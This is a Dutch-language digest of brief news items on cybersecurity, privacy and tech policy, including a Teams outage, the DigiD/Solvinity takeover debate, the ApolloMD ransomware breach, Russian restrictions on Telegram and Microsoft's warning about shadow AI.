Het rapport geeft aan dat veilige authenticatie essentieel is voor het beschermen van OT-systemen tegen ongeautoriseerde toegang en manipulatie. Zonder sterke authenticatie kunnen aanvallers gemakkelijk toegang krijgen tot kritieke systemen en processen, met mogelijk verwoestende gevolgen.

CISA biedt verschillende resources en tools aan om organisaties te helpen hun OT-beveiliging te verbeteren. Deze omvatten onder meer gratis cybersecurity services, richtlijnen voor veilige connectiviteit en informatie over het reduceren van het aanvalsoppervlak voor end-of-support edge devices. Daarnaast promoot CISA het "Secure by Design" principe en de "Shields Up" campagne. Organisaties worden aangemoedigd om cyberincidenten te melden bij CISA. Het rapport is beschikbaar in het Engels. CISA organiseert ook de Cyber Storm X: National Cyber Exercise.

Bron: CISA

Europese koepelorganisaties binnen de luchtvaartsector luiden de noodklok over een nieuw Europees registratiesysteem dat op luchthavens wordt geïmplementeerd. De sector vreest dat dit systeem zal leiden tot aanzienlijke vertragingen voor passagiers die van buiten de Europese Unie komen.

Volgens de internationale brancheorganisatie voor de luchtvaart IATA en de koepelorganisatie van luchthavens ACI Europe, dreigen er ernstige verstoringen tijdens de drukke zomermaanden als er niet snel maatregelen worden genomen. De wachttijden zouden kunnen oplopen tot vier uur of meer. Het nieuwe systeem vereist dat reizigers van buiten de EU zich registreren, wat mogelijk extra tijd in beslag neemt bij de douane. De luchtvaartsector dringt aan op onmiddellijke actie om de verwachte problemen te minimaliseren en te voorkomen dat passagiers onnodig lang moeten wachten.

Bron: BNR

De Autoriteit Persoonsgegevens (AP) moet binnen acht weken een nieuw besluit nemen over de verplichte pinbetaling bij Focus Filmtheater in Arnhem. De Raad van State oordeelde dat de AP het eerdere handhavingsverzoek van privacy-activist Michiel Jonker onvoldoende heeft gemotiveerd. Jonker diende in 2018 een verzoek in, omdat de bioscoop sinds de verhuizing in 2018 geen contante betalingen meer accepteert, naar eigen zeggen vanwege de veiligheid van medewerkers en vrijwilligers.

De AP wees het verzoek in 2019 af, stellende dat niemand verplicht is contant geld te accepteren en dat de bioscoop via de algemene voorwaarden een contract met bezoekers aangaat, waaruit een noodzaak tot gegevensverwerking zou voortvloeien. Jonker vreesde dat profilering mogelijk zou worden, waardoor achterhaald kan worden welke films iemand heeft bekeken. De rechtbank oordeelde in 2022 dat de AP niet hoefde in te grijpen, omdat de bioscoop een gerechtvaardigd belang heeft bij het verhogen van de veiligheid. Ook werd gesteld dat bioscoopbonnen, elders contant gekocht, een alternatief boden.

Jonker ging in beroep bij de Raad van State, mede omdat de Tweede Kamer een wetsvoorstel aannam waarin een acceptatieplicht voor contant geld staat. Hij stelt dat het dwingend opleggen van algemene voorwaarden in strijd is met artikel 8 van het Europees Verdrag voor de Rechten van de Mens (EVRM). De Raad van State stelt dat sociale veiligheid een gerechtvaardigd doel kan zijn voor pinbetalingen, maar dat op basis van de informatie niet vastgesteld kan worden of de veiligheid van medewerkers werkelijk in het geding is. De Raad van State stelt dat Jonker gemotiveerd betwist dat contante betalingen tot onveilige situaties leiden en dat de AP hier onvoldoende tegenover heeft gesteld. Alleen het risico op diefstal is onvoldoende reden om contante betalingen af te schaffen. De AP moet nu binnen acht weken een nieuw besluit nemen, waartegen beide partijen beroep kunnen aantekenen.

Bron: Security.NL

De gemeente Steenokkerzeel organiseert op de Europese dag van het noodnummer 112 infosessies om inwoners vertrouwd te maken met de 112 BE-app. De app stelt gebruikers in staat om in noodsituaties te chatten met de hulpdiensten, wat vooral handig is wanneer bellen geen optie is, bijvoorbeeld bij een inbraak waarbij men stil moet blijven. Burgemeester Kurt Ryon (Klaver-NVA) benadrukt het potentiële levensreddende aspect van de app.

Een belangrijk voordeel van de 112 BE-app is dat deze automatisch de locatie van de gebruiker doorstuurt naar de hulpdiensten. Dit bespaart kostbare tijd, vooral in situaties waarin men na een ongeval niet direct weet waar men zich bevindt. De gemeente hoopt dat een breder gebruik van de app zal leiden tot snellere en efficiëntere hulpverlening.

De infosessies vinden plaats in de bibliotheek van Steenokkerzeel en zijn bedoeld om inwoners uitleg te geven over de werking van de app en hen te helpen bij de installatie op hun smartphones. Burgemeester Ryon geeft aan dat veel inwoners de app nog niet kennen of er wantrouwig tegenover staan, met name oudere inwoners. De sessies zijn gratis en inschrijven is niet nodig.

Bron: VRT NWS | Bron 2: bsky.app

Microsoft Teams ondervindt wijdverspreide verstoringen in het beheer van opdrachten, wat een dringend onderzoek door het bedrijf noodzaakt. Gebruikers van Microsoft Teams ondervinden foutmeldingen bij het openen, instellen of verwijderen van opdrachten. Het probleem komt voort uit een recente backend-wijziging die niet correct is voltooid, wat leidt tot serviceonderbrekingen.

Beheerders worden doorverwezen naar het Microsoft 365-beheercentrum (incident ID TM1230627) voor updates en tijdlijnen. Deze storing treft voornamelijk de belangrijkste educatieve en productiviteitsfuncties binnen Teams, waaronder de apps Opdrachten, Klaslokaal en Cijfers. Rapporten geven aan dat het probleem zich uitstrekt over desktop-, web- en mobiele clients, met fouten als "Er is een probleem met het bereiken van deze app" die bij meerdere gebruikers en organisaties verschijnen.

Microsoft schrijft de verstoring toe aan een onvolledige service-update die gericht was op het optimaliseren van het ophalen van inhoud voor Opdrachten en gerelateerde tabbladen. Ingenieurs hebben de defecte implementatie geïdentificeerd en zijn bezig deze correct opnieuw te implementeren terwijl ze dieper graven. Het bedrijf is actief bezig met het herstarten van de getroffen backend-componenten om de functionaliteit te herstellen. Initiële fixes omvatten het valideren van de herimplementatie, waarbij service health dashboards in het beheercentrum real-time status bieden.

Getroffen gebruikers wordt aangeraden eerst het beheercentrum te controleren en herhaalde pogingen te vermijden om cacheopbouw te voorkomen. Het wissen van de Teams-cache via %appdata%\Microsoft\Teams op Windows of ~/Library/Application Support/Microsoft/Teams op Mac biedt tijdelijke verlichting. Overschakelen naar de webversie of uit- en inloggen kan helpen, hoewel volledig herstel op de fix wacht. IT-beheerders wordt aangeraden te rapporteren via Health > Service Health als dit nog niet wordt bijgehouden.

Dit incident onderstreept terugkerende Teams-kwetsbaarheden als gevolg van snelle updatecycli, zoals te zien is in Windows Update KB5003169 conflicten of TPM-fouten. Aangezien Teams integraal is voor hybride werken en onderwijs, versterken dergelijke storingen de roep om robuuste pre-deployment testen. Microsoft blijft de post-fix monitoren om herhalingen te voorkomen, volgens het standaardprotocol. Op 11 februari 2026 is er geen ETA voor volledige oplossing publiek, maar er wordt vooruitgang geboekt.

Bron: Microsoft

Het delen van foto's en bestanden tussen verschillende besturingssystemen wordt eenvoudiger. Jarenlang was het delen van bestanden tussen een iPhone en een Android-toestel omslachtig, omdat Apple's AirDrop exclusief voor iOS was. Android had met Quick Share een eigen systeem, maar deze twee technologieën waren niet compatibel.

Techjournalist Kenneth Dée van HLN meldt dat hier dit jaar verandering in komt. De nieuwe functionaliteit maakt het mogelijk om bestanden te delen tussen Android, Windows en iOS, waardoor het niet meer nodig is om bijvoorbeeld foto's naar jezelf te mailen of gebruik te maken van diensten zoals WeTransfer. Het nieuwe systeem zou een betere oplossing kunnen zijn dan bijvoorbeeld WhatsApp.

Bron: HLN.be

De Tweede Kamer debatteert over de mogelijke overname van Solvinity, het bedrijf achter DigiD, door het Amerikaanse Kyndryl. Wat begon als een zakelijke overname, is uitgegroeid tot een breder debat over digitale autonomie en nationale veiligheid. Politiek verslaggever Floor Doppen stelt de vraag of de Kamer op tijd handelt met de urgentie die het onderwerp vereist, of dat de actie te laat komt. De overname roept vragen op over de controle over de digitale infrastructuur en de bescherming van gevoelige gegevens van Nederlandse burgers. Er wordt gesproken over de afweging tussen economische belangen en de noodzaak om de digitale soevereiniteit te waarborgen. De uitkomst van het debat zal bepalend zijn voor de toekomst van DigiD en de rol van buitenlandse bedrijven in de Nederlandse digitale infrastructuur.

Bron: BNR

Een dochteronderneming van Meta is door een Duitse rechtbank veroordeeld tot het betalen van ongeveer dertig miljoen euro aan internetprovider Deutsche Telekom voor het gegenereerde dataverkeer. Edge Network Services, een dochter van Meta, maakte sinds 2010 gebruik van het netwerk van Deutsche Telekom. In 2020 zegde Meta het contract op nadat onderhandelingen over een lager tarief waren mislukt.

Deutsche Telekom bevestigde de opzegging, maar verklaarde dat het tegen betaling ip-transitdiensten aan Edge Network Services zou blijven leveren. De Meta-dochter bleef het netwerk van Deutsche Telekom gebruiken, maar betaalde de rekeningen niet. Een regionale rechtbank oordeelde begin 2024 dat de Meta-dochter de rekeningen van in totaal twintig miljoen euro alsnog moest betalen.

De daaropvolgende onderhandelingen leverden geen resultaat op, waarna de Meta-dochter eind 2024 aankondigde de directe peering-relatie met Deutsche Telekom te verbreken. Volgens Edge Network Services zijn directe peering-relaties de 'geaccepteerde wereldwijde standaard' en functioneren ze voor beide partijen 'settlement-free', omdat ze iedereen ten goede komen. Contentproviders zoals Meta investeren in producten en diensten die mensen willen gebruiken en telecomproviders zoals Deutsche Telekom verdienen door geld te rekenen voor internettoegang, aldus het bedrijf. Edge Network Services stelde dat Deutsche Telekom een gevaarlijk wereldwijd precedent schept dat een risico vormt voor netneutraliteit.

Deutsche Telekom reageerde door te stellen dat Edge Network Services de feiten verdraait en dat al het dataverkeer van Meta tegen betaling via directe verbindingen werd verwerkt. De provider eiste betaling en kreeg gelijk van een regionale rechtbank. Om de betaling te vermijden, routeerde Meta het dataverkeer via een transitprovider naar het netwerk van Deutsche Telekom, in plaats van de directe route.

De rechtbank in Düsseldorf heeft de uitspraak van een lagere rechtbank bekrachtigd en oordeelde dat Deutsche Telekom terecht een vergoeding mag eisen voor de geleverde diensten. De rechtbank ging ook akkoord met de aanvullende eis van de internetprovider voor een extra vergoeding van tien miljoen euro, bovenop de twintig miljoen euro die al eerder werd geëist voor de periode tot 11 augustus 2024. De rechtbank oordeelde dat Edge Network Services, door dataverkeer via Deutsche Telekom te blijven versturen, akkoord was gegaan met het eerder gedane voorstel. Het bedrijf had er ook voor kunnen kiezen om de diensten niet te gebruiken. Het contract is dan ook niet ongeldig, aldus de rechter. De lagere rechtbank stond de Meta-dochter niet toe om in beroep te gaan, maar de rechtbank in Düsseldorf heeft bepaald dat dit wel mogelijk is. Meta heeft aan Reuters laten weten zich niet in de uitspraak te kunnen vinden en naar mogelijke opties te kijken.

Bron: Reuters

In de Tweede Kamer zijn vragen gesteld aan demissionair staatssecretarissen Van Marum (Digitalisering) en Aartsen (Infrastructuur en Waterstaat) over de beslissing van de NS om een deel van haar automatisering uit te besteden aan een Amerikaans ict-bedrijf. Het betreft onder andere systemen voor financiële planning en treinonderhoud. De NS verklaarde op haar website dat ze gebonden is aan het aanbestedingsrecht en geen mogelijkheden heeft om Amerikaanse partijen te weigeren of benadelen op basis van hun nationaliteit.

GroenLinks-PvdA-Kamerleden Kathmann en De Hoop hebben de staatssecretarissen om opheldering gevraagd. Ze willen weten of er nationale richtlijnen zijn om Amerikaanse partijen te weren en of dit is voorzien in het nieuwe cloudbeleid dat nog in ontwikkeling is. Ook vragen ze of de staatssecretarissen de lange looptijd van het contract, zes tot twaalf jaar, geschikt achten gezien de geopolitieke onzekerheid met de Verenigde Staten.

De Kamerleden willen tevens weten of de Amerikaanse overheid, via wet- en regelgeving zoals de CLOUD Act, Foreign Intelligence Surveillance Act (FISA), en Executive Order 12333, toegang kan krijgen tot gevoelige gegevens over de Nederlandse spoorinfrastructuur. Kathmann en De Hoop vragen hoe de staatssecretarissen aankijken tegen de keuze van de NS om, tegen de achtergrond van de huidige geopolitieke situatie en de nadruk op digitale autonomie, toch ict uit te besteden aan een niet-Europees bedrijf.

Verder willen Kathmann en De Hoop weten of het klopt dat de uitbestede processen niet missiekritisch zijn en of de keuze van de NS past binnen de ambitie van het kabinet om digitaal onafhankelijker te worden. Ook vragen ze naar de rol van de Staat als enig aandeelhouder. De staatssecretarissen hebben drie weken de tijd om de vragen te beantwoorden.

Bron: Europese Commissie

Microsoft heeft een gids gepubliceerd voor strategische SIEM-aankopen, gericht op de verschuiving naar een "agentic era" in security operations. Traditionele SIEM-oplossingen en gefragmenteerde toolchains kunnen volgens Microsoft niet langer de complexiteit en snelheid van moderne cyberdreigingen bijbenen. De gids beschrijft de belangrijkste overwegingen voor het bouwen van een toekomstbestendig security operations center (SOC).

Een unified, cloud-native platform biedt security teams consistent inzicht, elastische schaalbaarheid en een single source of truth voor zowel analisten als AI-systemen. Door kernfuncties in één omgeving te consolideren, kunnen organisaties hun SOC moderniseren en profiteren van AI-gestuurde beveiligingsmogelijkheden. Moderne platforms verbeteren detectie en respons met adaptieve automatisering, waardoor handmatige stappen worden verminderd en exposure windows worden verkort. Standaardisatie van toegang tot hoogwaardige beveiligingsdata en het in staat stellen van agents om op basis van die context te handelen, verbetert de precisie, vermindert ruis en maakt een transitie mogelijk van reactieve triage naar continue, intelligence-gedreven respons.

Moderne SIEM-platforms moeten meetbare resultaten leveren zonder lange implementatietrajecten of zware afhankelijkheid van gespecialiseerde expertise. AI-ready oplossingen verkorten de onboarding tijd door middel van prebuilt connectors, embedded analytics en kant-en-klare content. Microsoft Sentinel biedt voordelen op het gebied van cloud-native schaalbaarheid, een unified data foundation, geïntegreerde SIEM, security orchestration, automation and response (SOAR), extended detection and response (XDR) en advanced analytics in één AI-ready platform. De gids bevat praktische tips voor het evalueren van leveranciers, waarbij het belang van unification, cloud-native elasticiteit en het vermijden van gefragmenteerde add-ons wordt benadrukt. Het bouwen van een unified foundation, het versnellen van detectie en respons met AI, en het maximaliseren van de return on investment door een snelle time-to-value vormen een roadmap voor het moderniseren van security operations.

Bron: Microsoft

De Tweede Kamer wil dat de servers, opslag en beveiliging van DigiD in Nederlandse handen blijven. Een motie van GroenLinks-PvdA-Kamerlid Kathmann, die de regering hiertoe oproept, kan rekenen op een Kamermeerderheid, zo meldt RTL Nieuws. Kathmann had haar motie al in december ingediend, maar besloot de stemming uit te stellen.

Vandaag vindt er in de Tweede Kamer een debat plaats over de dreigende overname van Solvinity door een Amerikaans bedrijf. DigiD draait op servers van dit cloudbedrijf, evenals de dienst MijnOverheid en het beveiligde communicatiesysteem van het ministerie van Justitie en Veiligheid. De aangekondigde overname van Solvinity veroorzaakt zorgen over de integriteit van gegevens en de continuïteit van de dienstverlening van overheidsdiensten.

In haar motie stelt Kathmann dat Solvinity op het punt staat te worden overgenomen door een Amerikaanse partij. Ze verzoekt de regering om de servers, opslag en beveiliging van DigiD en andere diensten die draaien op Solvinity bij voorkeur in Nederlandse en anders in Europese handen te houden, aangezien de Staatssecretaris van Binnenlandse Zaken en Koninkrijksrelaties al heeft uitgesproken dat DigiD Nederlands blijft, zowel qua software als infrastructuur.

"We willen gewoon niet dat dit in Amerikaanse handen komt. Punt", zegt Kathmann tegenover RTL Nieuws. Ze erkent dat de Kamer een overname van Solvinity niet kan tegenhouden. Mocht de overname toch plaatsvinden, dan vindt Kathmann dat de contracten na afloop moeten worden teruggehaald en gegund aan een Nederlandse partij.

Bron: Security.NL | Bron 2: ftm.nl | Bron 3: theregister.com | Bron 4: forbes.com | Bron 5: vectra.ai | Bron 6: idlayr.com

De waarnemend directeur van het Cybersecurity and Infrastructure Security Agency (CISA), Madhu Gottumukkala, heeft woensdag voor de House Appropriations Homeland Security subcommittee gewaarschuwd voor de gevolgen van een mogelijke shutdown van het Department of Homeland Security (DHS). Volgens Gottumukkala zou een shutdown de capaciteit van CISA verminderen om tijdig advies te geven aan partners voor de verdediging van hun netwerken. De operaties zouden onder druk komen te staan en kerntaken, zoals digitale respons, zouden worden ingeperkt. Meer dan een derde van de security experts en threat hunters zou zonder salaris moeten werken, zelfs wanneer statelijke actoren hun inspanningen intensiveren om systemen te misbruiken.

Gottumukkala benadrukte dat cyberdreigingen niet stoppen tijdens een shutdown van de overheid. Naast het feit dat ongeveer 900 CISA-medewerkers geen salaris zouden ontvangen, zou een shutdown ook het werk van het agentschap belemmeren bij het bijwerken van de langverwachte regel voor het melden van cyberincidenten. De activiteiten van CISA zouden beperkt blijven tot essentiële zaken die nodig zijn om levens en eigendommen te beschermen. Proactieve vulnerability scanning zou niet mogelijk zijn.

Gottumukkala gaf aan dat CISA ongeveer 70 medewerkers heeft overgeplaatst naar andere DHS-onderdelen en meer dan 30 medewerkers van andere onderdelen heeft opgenomen. Een klein aantal personeelsleden is overgeplaatst naar ICE. CISA heeft ongeveer een derde van zijn personeel verloren sinds het begin van de tweede regering-Trump.

Rep. Rosa DeLauro introduceerde wetgeving die alle DHS-onderdelen zou financieren, met uitzondering van ICE en CBP.

Bron: The Record | Bron 2: docs.house.gov | Bron 3: democrats-appropriations.ho... | Bron 4: news.ycombinator.com | Bron 5: bsky.app | Bron 6: recordedfuture.com

Een coalitie van 40 Amerikaanse procureurs-generaal (attorneys general, AG) heeft een brief gestuurd aan het Huis van Afgevaardigden waarin ze hun bezorgdheid uiten over de zwakke versie van de Kids Online Safety Act (KOSA). Volgens hen schiet het wetsvoorstel tekort in het beschermen van minderjarigen online.

De versie van het Huis van Afgevaardigden mist cruciale elementen die wel in de Senaatsversie zijn opgenomen. Een belangrijk punt van kritiek is dat het federale recht bestaande, strengere staatswetten zou kunnen overrulen. Daarnaast specificeert het wetsvoorstel niet de schadelijke effecten van online content, zoals eetstoornissen, suïcide, compulsief gebruik en andere mentale gezondheidsproblemen. Ook ontbreekt een zorgplicht, die online platforms zou verplichten redelijke maatregelen te nemen om voorzienbare en specifieke schade aan minderjarigen, voortkomend uit hun ontwerpkenmerken, te voorkomen.

De brief volgt op de opening van een rechtszaak waarin de staat New Mexico Meta beschuldigt van het niet beschermen van kinderen tegen mensenhandel, seksueel misbruik en online intimidatie. De procureur-generaal van New Mexico stelt dat het ontwerp van Facebook en Instagram heeft geleid tot de aanbeveling van accounts van kindermisbruikers en seksueel misbruikmateriaal aan minderjarigen.

De procureurs-generaal stellen in hun brief dat sociale mediaplatforms een serieuze en groeiende bedreiging vormen voor minderjarigen. Ze beweren dat veel platforms zich opzettelijk richten op minderjarigen, wat bijdraagt aan een landelijke crisis in de geestelijke gezondheid van jongeren. De platforms zouden intentioneel verslavend zijn ontworpen, vooral voor minderjarige gebruikers, en aanzienlijke winsten genereren door het te gelde maken van persoonlijke gegevens via gerichte advertenties. De bedrijven zouden de verslavende aard van hun producten en de risico's van excessief gebruik van sociale media onvoldoende openbaar maken.

Burgerrechtenorganisaties hebben zich verzet tegen KOSA, omdat ze vrezen dat het de online vrijheid van jongeren zou beperken, de vrijheid van meningsuiting zou schenden en LGBTQ+-jongeren zou belemmeren toegang te krijgen tot informatie. De Senaatsversie van KOSA wordt gesteund door senator Marsha Blackburn, die heeft aangedrongen op het behoud van de zorgplicht in het wetsvoorstel. In het Huis van Afgevaardigden is er minder brede steun voor de wet. De twee kamers van het Congres moeten nog overeenstemming bereiken over de uiteindelijke tekst van het wetsvoorstel. Een eerdere versie van KOSA, toen bekend als de Kids Online Safety and Privacy Act, strandde in het vorige Congres omdat de kamers het niet eens konden worden over de formulering.

Bron: The Record | Bron 2: ag.ny.gov | Bron 3: news.ycombinator.com | Bron 4: bsky.app | Bron 5: recordedfuture.com

Een cyberaanval op een prominent medisch bedrijf in Georgia, ApolloMD, heeft geleid tot het lekken van gevoelige informatie van 626.540 mensen. Het bedrijf, dat multispecialistische medische diensten verleent aan meer dan 100 ziekenhuizen en 125 praktijken in 18 Amerikaanse staten, stelde federale toezichthouders op dinsdag op de hoogte van het volledige aantal slachtoffers. In september 2025 informeerde ApolloMD klanten al over het datalek.

Uit onderzoek is gebleken dat hackers tussen 22 en 23 mei 2025 toegang hadden tot de IT-omgeving van ApolloMD. Tijdens deze inbraak hebben ze informatie buitgemaakt van mensen die behandeld zijn door aan ApolloMD gelieerde artsen en praktijken. De gestolen gegevens omvatten namen, geboortedata, adressen, diagnoses, data van dienstverlening, behandelingen, gegevens van ziektekostenverzekeringen en burgerservicenummers.

De aanval werd in juni 2025 opgeëist door de Qilin ransomware-groep. Deze groep heeft zich herhaaldelijk gericht op de gezondheidszorg en veroorzaakte vorig jaar uitval in ziekenhuizen in verschillende staten en in 2024 in het Verenigd Koninkrijk. Uit een studie van Cisco Talos bleek dat de groep vorig jaar de informatie van ongeveer 40 slachtoffers per maand publiceerde.

Bron: ApolloMD | Bron 2: go.pardot.com | Bron 3: news.ycombinator.com | Bron 4: bsky.app | Bron 5: recordedfuture.com

Rusland heeft de beperkingen op Telegram, het populaire messaging platform, verder aangescherpt, wat leidt tot wijdverspreide serviceonderbrekingen voor gebruikers in het hele land. De Russische communicatieregulator, Roskomnadzor, heeft bevestigd dat de app opzettelijk wordt vertraagd, omdat het bedrijf naar verluidt de Russische wetgeving niet naleeft. Bijna 90 miljoen lokale gebruikers ondervinden hinder.

Volgens staatsmedia heeft een rechtbank in Moskou sinds begin 2026 zeven zaken geopend tegen Telegram, omdat het bedrijf zou weigeren inhoud te verwijderen die volgens de autoriteiten oproepen tot "extremistische" activiteiten bevat of pornografisch materiaal. Het platform zou boetes van in totaal meer dan $820.000 tegemoet zien. Kremlin-woordvoerder Dmitry Peskov verklaarde dat Rusland in contact blijft met het bedrijf, maar dat de beperkingen van kracht blijven zolang de vermeende schendingen voortduren.

Russische gebruikers meldden eerder deze week wijdverspreide Telegram-storingen, volgens gegevens van internetmonitoringdienst Downdetector. Lokale internetanalisten meldden dat bijna 15 Russische regio's de afgelopen twee dagen aanzienlijke vertragingen hebben ondervonden. Pavel Durov, de oprichter van het in Dubai gevestigde bedrijf, noemde de nieuwe beperkingen "een autoritaire zet" en beschuldigde Moskou ervan te proberen Russen te dwingen over te stappen op een door de staat gecontroleerde messaging-app "gebouwd voor surveillance en politieke censuur". Durov vergeleek de acties van Rusland met het verbod van Iran op Telegram, dat werd opgelegd in een poging gebruikers naar een door de overheid gesteund alternatief te duwen. Ondanks het verbod bleven de meeste Iraniërs Telegram gebruiken via omzeilingstools, aldus Durov.

In 2018 beval een rechtbank het platform te verbieden nadat het weigerde encryptiesleutels over te dragen aan de Federale Veiligheidsdienst (FSB). Het verbod werd in 2020 opgeheven nadat Telegram signalen had afgegeven bereid te zijn te helpen bij de bestrijding van terrorisme en extremisme. Meer recentelijk, in augustus, kondigde Roskomnadzor beperkingen aan op gesprekken via Telegram en WhatsApp, omdat de diensten vaak door fraudeurs werden gebruikt om Russische burgers te rekruteren voor "sabotage en terroristische activiteiten".

Als vervanging voor deze apps promoten Russische functionarissen een nationaal messaging platform genaamd Max, een door de overheid gesteunde dienst gemodelleerd naar China's WeChat en ontwikkeld door de maker van het sociale netwerk VKontakte. De nieuwste Telegram-beperkingen hebben echter kritiek uitgelokt in Rusland, ook van staatsfunctionarissen en leden van het leger. Autoriteiten in de regio Belgorod, die grenst aan Oekraïne en regelmatig wordt aangevallen, waarschuwden dat verdere Telegram-storingen veiligheidsrisico's zouden kunnen opleveren. De gouverneur van de regio zei dat veel inwoners tijdens oorlogstijd op Telegram vertrouwen voor nieuws en noodupdates, en dat vertragingen de verspreiding van kritieke waarschuwingen zouden kunnen vertragen. Pro-oorlog militaire bloggers bekritiseerden de maatregel ook. Telegram is diep ingebed geraakt in de Russische oorlogsinspanning: militaire eenheden gebruiken het platform vaak om logistiek te coördineren, benodigdheden te crowdsourcen, te communiceren met supporters en frontline updates te delen. Peskov verwierp die zorgen en zei dat militaire communicatie niet via messaging apps verloopt en dat de impact op operaties aan de frontlinie waarschijnlijk beperkt zal zijn.

De nieuwe beperkingen komen te midden van een bredere golf van internetstoringen in Rusland. Sinds mei hebben regionale autoriteiten herhaaldelijk de mobiele internettoegang afgesneden, zogenaamd om Oekraïense drone aanvallen tegen te gaan. In oktober legde Rusland een verplichte 24-uurs mobiele internet black-out op voor iedereen die het land binnenkomt met een buitenlandse simkaart, wat grote overlast veroorzaakte voor reizigers, expats en grensoverschrijdende bedrijven. De meeste grote westerse platforms, waaronder Facebook, Instagram en Discord, zijn al ontoegankelijk in Rusland zonder een VPN.

Bron: The Record | Bron 3: tass.ru

De Belgische bank KBC introduceert binnenkort een nieuwe functie in haar app waarmee klanten een vertrouwenspersoon, een "engelbewaarder", kunnen aanwijzen die meldingen ontvangt over verdachte transacties. Deze persoon kan, na overleg met de klant, de transactie bevestigen of annuleren. Volgens KBC is deze maatregel bedoeld om fraude tegen te gaan, aangezien klanten vaak moeite hebben om echt van nep te onderscheiden en overtuigend in fraudeverhalen worden meegesleurd.

KBC meldt dat het eigen Secure4U-meldpunt dagelijks ongeveer duizend meldingen van verdachte transacties behandelt en contact opneemt met klanten bij een vermoeden van fraude. Echter, slachtoffers van "human takeover" fraude zijn vaak zo overtuigd door de fraudeurs dat het moeilijk wordt om de fraude te doorzien.

Om gebruik te maken van de nieuwe dienst, selecteert de klant een vertrouwenspersoon, die vervolgens een QR-code moet scannen via zijn of haar eigen KBC-app. Na activatie ontvangt de engelbewaarder, naast de bestaande opvolging door Secure4U, automatisch meldingen in de app bij bepaalde verdachte transacties. De vertrouwenspersoon kan dan, na contact met de klant, de overschrijving goedkeuren of annuleren.

KBC is van plan de optie later dit voorjaar te lanceren en is bereid het concept met andere banken te delen. De bank onderzoekt ook of de engelbewaarder voor andere toepassingen ingezet kan worden.

Bron: Security.NL

De Europese Commissie heeft Google toestemming gegeven om securitybedrijf Wiz over te nemen. Google had vorig jaar aangekondigd Wiz voor 32 miljard dollar te willen kopen. Wiz levert cloudbeveiliging en Google wil deze diensten gebruiken om de eigen cloudbeveiliging te verbeteren en de mogelijkheid bieden om meerdere clouds van verschillende leveranciers te gebruiken.

De Europese Commissie heeft een marktonderzoek uitgevoerd om te bepalen of de overname de concurrentie zou schaden. Uit het onderzoek bleek dat er voldoende alternatieven zijn voor klanten, mocht Google het beveiligingsplatform van Wiz bundelen met de eigen diensten of het platform van Wiz exclusief met Google laten werken.

De commissie heeft ook onderzocht of Google door de overname toegang zou krijgen tot commercieel gevoelige data van concurrerende cloudproviders die eveneens gebruikmaken van Wiz. De conclusie was dat de data die Google via de overname verkrijgt niet commercieel gevoelig is en ook toegankelijk is voor andere beveiligingsaanbieders. De Europese Commissie heeft daarom geen bezwaren tegen de overname en heeft onvoorwaardelijk groen licht gegeven.

Bron: Europese Commissie | Bron 2: ec.europa.eu | Bron 3: blog.google

In de Tweede Kamer zijn vragen gesteld over de keuze van de NS om de automatisering deels uit te besteden aan een Amerikaans ict-bedrijf. Demissionair staatssecretarissen Van Marum voor Digitalisering en Aartsen van Infrastructuur en Waterstaat zijn gevraagd om opheldering. De uitbesteding betreft onder meer systemen voor financiële planning en treinonderhoud.

GroenLinks-PvdA-Kamerleden Kathmann en De Hoop hebben de vragen gesteld. Ze willen weten of er nationale richtlijnen zijn om Amerikaanse partijen te weren en of dit is voorzien in het nieuwe cloudbeleid. Ook vragen ze of de staatssecretarissen de lange doorlooptijd van het contract (zes tot twaalf jaar) geschikt vinden, gezien de geopolitieke onzekerheid met de Verenigde Staten.

De Kamerleden willen ook duidelijkheid over de toegang van de Amerikaanse overheid tot gevoelige gegevens over de Nederlandse spoorinfrastructuur, via wet- en regelgeving zoals de CLOUD Act, Foreign Intelligence Surveillance Act (FISA) en Executive Order 12333. Ze vragen hoe de staatssecretarissen aankijken tegen de keuze van de NS om, gezien de huidige geopolitieke situatie en het belang van digitale autonomie, ict uit te besteden aan een niet-Europees bedrijf.

Verder willen Kathmann en De Hoop weten of de uitbestede processen niet missiekritisch zijn en of de keuze van de NS past binnen de ambitie van het kabinet om digitaal onafhankelijker te worden. Ze vragen welke rol de Staat als enig aandeelhouder hierin speelt. De staatssecretarissen hebben drie weken de tijd om de vragen te beantwoorden. De NS stelt gebonden te zijn aan het aanbestedingsrecht en geen mogelijkheden te hebben om Amerikaanse partijen te weigeren of benadelen.

Bron: NSA

Microsoft heeft aangekondigd dat Windows 11 versie 26H1 niet als een feature-update zal worden aangeboden aan systemen die al draaien op Windows 11 versie 24H2 of 25H2. Deze versies blijven voorlopig de aanbevolen opties voor bedrijven en zullen gedurende hun levenscyclus beveiligingsupdates blijven ontvangen.

De nieuwe Windowsversie, die gisteren werd gelanceerd, is een "speciale Windows-release" die momenteel alleen werkt op Qualcomm Snapdragon X2-processors. Deze versie draait op een andere Windows core, waardoor computers die Windows 11 versie 26H1 gebruiken niet kunnen updaten naar Windows 11 versie 26H2.

Windows 11 ontvangt jaarlijks een feature-update in de tweede helft van het jaar, aangeduid als bijvoorbeeld 24H2 en 25H2. Microsoft zal later dit jaar met Windows 11 versie 26H2 komen.

Windows 11 versie 26H1 ondersteunt geen hotpatching, maar beveiligingsupdates kunnen wel worden uitgerold via oplossingen zoals Windows Autopatch en Microsoft Intune. De versie zal ook niet als 'in-place update' worden aangeboden aan Windows 11 machines met versie 24H2 en 25H2.

Volgens Microsoft is Windows 11 versie 26H1 geen feature-update voor versie 25H2. Het bedrijf stelt dat er geen reden is om de aanschaf van systemen of de uitrol van besturingssystemen te pauzeren, en dat er geen aanpassingen nodig zijn aan bestaande zakelijke uitrolplannen. Bedrijven wordt geadviseerd zich bij het aanschaffen, uitrollen en beheren van systemen te blijven richten op Windows 11 versies 24H2 en 25H2.

Bron: Microsoft

Microsoft waarschuwt voor de veiligheidsrisico's die ontstaan wanneer werknemers AI-tools gebruiken zonder medeweten van de IT-afdeling. Het technologieconcern benadrukt de gevaren van het ongecontroleerde gebruik van autonome software met artificiële intelligentie.

Onderzoekers van Microsoft stellen in het Cyber Pulse Report vast dat AI-hulpmiddelen bij het programmeren al in meer dan 80 procent van de Fortune 500-bedrijven worden gebruikt. Een gebrek aan duidelijke regels voor het gebruik van AI binnen bedrijven brengt risico's met zich mee. Microsoft waarschuwt dat een gebrek aan overzicht en 'schaduw-AI' de deur openzet voor nieuwe aanvalsmethoden.

